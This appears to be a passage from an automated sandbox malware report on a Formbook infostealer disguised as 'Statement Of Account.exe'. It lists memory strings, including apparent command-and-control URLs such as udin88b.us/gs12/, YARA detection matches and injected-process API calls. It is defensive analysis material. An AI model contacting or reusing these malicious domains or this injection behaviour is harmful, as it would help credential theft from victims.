Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.us/gs12/www.baansbliss.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.udin88b.usReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com/gs12/
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.com/gs12/www.hjgd.xyz
Source: explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zdryueva.comReferer:
Source: Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000009.00000002.2951588982.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000009.00000000.1714988461.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000009.00000000.1710227267.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1704959989.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2940190226.000000000370D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.1721919184.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.2951588982.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

E-Banking Fraud

Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2954894231.000000000F91C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Statement Of Account.exe PID: 6744, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7572, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmstp.exe PID: 7592, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: colorcpl.exe PID: 7600, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Statement Of Account.exe.5b50000.5.raw.unpack, HomeView.cs Large array initialization: : array initializer size 33604
Source: Statement Of Account.exe, Form1.cs Long String: Length: 129808
Source: SdYCcXyq.exe.0.dr, Form1.cs Long String: Length: 129808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk, 8_2_00FB2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_00FB2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2B60 NtClose,LdrInitializeThunk, 8_2_00FB2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_00FB2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00FB2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00FB2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DD0 NtDelayExecution,LdrInitializeThunk, 8_2_00FB2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_00FB2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_00FB2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00FB2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_00FB2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FE0 NtCreateFile,LdrInitializeThunk, 8_2_00FB2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2FB0 NtResumeThread,LdrInitializeThunk, 8_2_00FB2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F90 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_00FB2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2F30 NtCreateSection,LdrInitializeThunk, 8_2_00FB2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB4340 NtSetContextThread, 8_2_00FB4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB4650 NtSuspendThread, 8_2_00FB4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AF0 NtWriteFile, 8_2_00FB2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2AB0 NtWaitForSingleObject, 8_2_00FB2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BE0 NtQueryValueKey, 8_2_00FB2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2BA0 NtEnumerateValueKey, 8_2_00FB2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2B80 NtQueryInformationFile, 8_2_00FB2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CF0 NtOpenProcess, 8_2_00FB2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2CC0 NtQueryVirtualMemory, 8_2_00FB2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C60 NtCreateKey, 8_2_00FB2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2C00 NtQueryInformationProcess, 8_2_00FB2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2DB0 NtEnumerateKey, 8_2_00FB2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2D00 NtSetInformationFile, 8_2_00FB2D00
